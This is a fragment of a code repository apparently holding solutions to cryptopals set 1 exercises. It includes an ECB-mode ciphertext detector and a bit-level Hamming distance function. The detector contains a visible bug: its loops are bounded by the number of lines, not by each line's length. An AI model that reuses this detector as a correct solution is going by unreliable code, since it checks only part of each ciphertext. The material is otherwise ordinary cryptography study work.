S15AVD2QS1V6fhRimJSVyT6QuGb8tKRsl2N+a2Xze36vgMhw7XK7zh//jC2H 65 | -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/8.py: -------------------------------------------------------------------------------- 1 | f = open("8.txt").read() 2 | f_split = [i for i in f.split("\n")] 3 | blocksize = 16 4 | for i in f_split: 5 | cnt = 0 6 | for j in range(0,len(f_split),blocksize): 7 | for k in range(j+blocksize,len(f_split),blocksize): 8 | if(i[j:j+blocksize]==i[k:k+blocksize]): 9 | cnt += 1 10 | if(cnt==2): 11 | print("Possible ECB : " + i) 12 | elif(cnt>2): 13 | print("Fix ECB : " + i) -------------------------------------------------------------------------------- /solver/lifetime/cryptopals/01/hamming-distance.py: -------------------------------------------------------------------------------- 1 | def s2b(a): 2 | res = "" 3 | for i in a: 4 | res += bin(ord(i))[2:].rjust(8,"0") 5 | return res 6 | 7 | def check(a,b): 8 | cnt = 0 9 | for i in range(len(a)): 10 | if(a[i]!=b[i]): 11 | cnt += 1 12 | return cnt 13 | 14 | a = "this is a test" 15 | b = "wokka wokka!!!" 16 | a = s2b(a) 17 | b = s2b(b) 18 | print(check(a,b)) --------------------------------------------------------------------------------